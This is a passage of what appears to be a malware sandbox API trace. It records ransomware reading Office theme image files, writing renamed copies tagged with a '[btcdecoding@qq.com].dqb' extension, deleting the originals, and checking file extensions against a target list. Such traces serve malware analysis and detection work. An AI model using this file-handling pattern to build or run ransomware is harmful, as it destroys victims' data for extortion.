shared\\themes14\\satin\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0045.113] GetLastError () returned 0x0 [0045.113] ReadFile (in: hFile=0x160, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0xe1b, lpOverlapped=0x0) returned 1 [0045.245] WriteFile (in: hFile=0x204, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xe20, lpOverlapped=0x0) returned 1 [0045.245] ReadFile (in: hFile=0x160, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.245] WriteFile (in: hFile=0x204, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.246] SetEndOfFile (hFile=0x204) returned 1 [0045.246] CloseHandle (hObject=0x204) returned 1 [0045.246] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.246] SetEndOfFile (hFile=0x160) returned 1 [0045.246] CloseHandle (hObject=0x160) returned 1 [0045.247] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0045.247] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif")) returned 1 [0045.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0045.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0045.247] lstrlenW (lpString=".doc") returned 4 [0045.247] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.247] lstrlenW (lpString=".docx") returned 5 [0045.247] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.247] lstrlenW (lpString=".pdf") returned 4 [0045.247] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.247] lstrlenW (lpString=".xls") returned 4 [0045.247] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.247] lstrlenW (lpString=".xlsx") returned 5 [0045.247] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.247] lstrlenW (lpString=".ppt") returned 4 [0045.247] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0045.247] lstrlenW (lpString=".zip") returned 4 [0045.247] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.247] lstrlenW (lpString=".rar") returned 4 [0045.247] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.247] lstrlenW (lpString=".bz2") returned 4 [0045.247] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.247] lstrlenW (lpString=".7z") returned 3 [0045.247] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0045.248] lstrlenW (lpString=".dbf") returned 4 [0045.248] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0045.248] lstrlenW (lpString=".1cd") returned 4 [0045.248] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0045.248] lstrlenW (lpString=".jpg") returned 4 [0045.248] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0045.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0045.248] lstrlenW (lpString=".doc") returned 4 [0045.248] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.248] lstrlenW (lpString=".docx") returned 5 [0045.248] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.248] lstrlenW (lpString=".pdf") returned 4 [0045.248] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.248] lstrlenW (lpString=".xls") returned 4 [0045.248] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.248] lstrlenW (lpString=".xlsx") returned 5 [0045.248] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.248] lstrlenW (lpString=".ppt") returned 4 [0045.248] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0045.248] lstrlenW (lpString=".zip") returned 4 [0045.248] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.248] lstrlenW (lpString=".rar") returned 4 [0045.248] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.248] lstrlenW (lpString=".bz2") returned 4 [0045.248] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.248] lstrlenW (lpString=".7z") returned 3 [0045.248] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0045.248] lstrlenW (lpString=".dbf") returned 4 [0045.248] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0045.249] lstrlenW (lpString=".1cd") returned 4 [0045.249] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0045.249] lstrlenW (lpString=".jpg") returned 4 [0045.249] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.249] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0045.249] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.249] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0045.967] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=2209) returned 1 [0045.967] CloseHandle (hObject=0x214) returned 1 [0045.967] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif")) returned 0x20 [0045.967] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0045.967] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0045.967] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.967] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.967] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0045.968] GetLastError () returned 0x0 [0045.968] ReadFile (in: hFile=0x214, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x8a1, lpOverlapped=0x0) returned 1 [0045.969] WriteFile (in: hFile=0x154, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x8b0, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x8b0, lpOverlapped=0x0) returned 1 [0045.970] ReadFile (in: hFile=0x214, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.970] WriteFile (in: hFile=0x154, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.970] SetEndOfFile (hFile=0x154) returned 1 [0045.970] CloseHandle (hObject=0x154) returned 1 [0045.970] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.970] SetEndOfFile (hFile=0x214) returned 1 [0045.971] CloseHandle (hObject=0x214) returned 1 [0045.971] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0045.971] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif")) returned 1 [0045.971] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0045.971] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0045.971] lstrlenW (lpString=".doc") returned 4 [0045.971] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.971] lstrlenW (lpString=".docx") returned 5 [0045.972] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.972] lstrlenW (lpString=".pdf") returned 4 [0045.972] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.972] lstrlenW (lpString=".xls") returned 4 [0045.972] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.972] lstrlenW (lpString=".xlsx") returned 5 [0045.972] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.972] lstrlenW (lpString=".ppt") returned 4 [0045.972] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.972] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0045.972] lstrlenW (lpString=".zip") returned 4 [0045.972] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.972] lstrlenW (lpString=".rar") returned 4 [0045.972] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.972] lstrlenW (lpString=".bz2") returned 4 [0045.972] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.972] lstrlenW (lpString=".7z") returned 3 [0045.972] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.972] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0045.972] lstrlenW (lpString=".dbf") returned 4 [0045.972] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.972] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0045.972] lstrlenW (lpString=".1cd") returned 4 [0045.972] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.972] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0045.972] lstrlenW (lpString=".jpg") returned 4 [0045.972] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.972] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0045.972] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0045.972] lstrlenW (lpString=".doc") returned 4 [0045.972] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.972] lstrlenW (lpString=".docx") returned 5 [0045.972] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.972] lstrlenW (lpString=".pdf") returned 4 [0045.972] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.972] lstrlenW (lpString=".xls") returned 4 [0045.973] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.973] lstrlenW (lpString=".xlsx") returned 5 [0045.973] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.973] lstrlenW (lpString=".ppt") returned 4 [0045.973] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.973] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0045.973] lstrlenW (lpString=".zip") returned 4 [0045.973] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.973] lstrlenW (lpString=".rar") returned 4 [0045.973] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.973] lstrlenW (lpString=".bz2") returned 4 [0045.973] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.973] lstrlenW (lpString=".7z") returned 3 [0045.973] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.973] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0045.973] lstrlenW (lpString=".dbf") returned 4 [0045.973] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.973] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0045.973] lstrlenW (lpString=".1cd") returned 4 [0045.973] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.973] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0045.973] lstrlenW (lpString=".jpg") returned 4 [0045.973] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.973] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0045.973] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.973] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0045.974] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=1675) returned 1 [0045.974] CloseHandle (hObject=0x214) returned 1 [0045.974] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif")) returned 0x20 [0045.974] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0045.974] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0045.974] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.974] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.974] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0045.976] GetLastError () returned 0x0 [0045.976] ReadFile (in: hFile=0x214, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x68b, lpOverlapped=0x0) returned 1 [0045.978] WriteFile (in: hFile=0x208, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x690, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x690, lpOverlapped=0x0) returned 1 [0045.979] ReadFile (in: hFile=0x214, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.979] WriteFile (in: hFile=0x208, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.979] SetEndOfFile (hFile=0x208) returned 1 [0045.979] CloseHandle (hObject=0x208) returned 1 [0045.979] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.979] SetEndOfFile (hFile=0x214) returned 1 [0045.980] CloseHandle (hObject=0x214) returned 1 [0045.980] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0045.980] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif")) returned 1 [0045.980] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0045.980] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0045.980] lstrlenW (lpString=".doc") returned 4 [0045.980] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.980] lstrlenW (lpString=".docx") returned 5 [0045.980] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.980] lstrlenW (lpString=".pdf") returned 4 [0045.980] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.980] lstrlenW (lpString=".xls") returned 4 [0045.980] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.980] lstrlenW (lpString=".xlsx") returned 5 [0045.980] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.980] lstrlenW (lpString=".ppt") returned 4 [0045.980] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.980] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0045.981] lstrlenW (lpString=".zip") returned 4 [0045.981] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.981] lstrlenW (lpString=".rar") returned 4 [0045.981] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.981] lstrlenW (lpString=".bz2") returned 4 [0045.981] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.981] lstrlenW (lpString=".7z") returned 3 [0045.981] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.981] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0045.981] lstrlenW (lpString=".dbf") returned 4 [0045.981] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.981] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0045.981] lstrlenW (lpString=".1cd") returned 4 [0045.981] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.981] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0045.981] lstrlenW (lpString=".jpg") returned 4 [0045.981] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.981] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0045.981] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0045.981] lstrlenW (lpString=".doc") returned 4 [0045.981] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.981] lstrlenW (lpString=".docx") returned 5 [0045.981] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.981] lstrlenW (lpString=".pdf") returned 4 [0045.981] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.981] lstrlenW (lpString=".xls") returned 4 [0045.982] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.982] lstrlenW (lpString=".xlsx") returned 5 [0045.982] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.982] lstrlenW (lpString=".ppt") returned 4 [0045.982] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0045.982] lstrlenW (lpString=".zip") returned 4 [0045.982] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.982] lstrlenW (lpString=".rar") returned 4 [0045.982] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.982] lstrlenW (lpString=".bz2") returned 4 [0045.982] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.982] lstrlenW (lpString=".7z") returned 3 [0045.982] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0045.982] lstrlenW (lpString=".dbf") returned 4 [0045.982] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0045.982] lstrlenW (lpString=".1cd") returned 4 [0045.982] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0045.982] lstrlenW (lpString=".jpg") returned 4 [0045.982] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.982] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0045.982] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.982] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0045.983] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=18380) returned 1 [0045.983] CloseHandle (hObject=0x214) returned 1 [0045.983] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png")) returned 0x20 [0045.983] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0045.983] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0045.983] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.983] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.983] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, 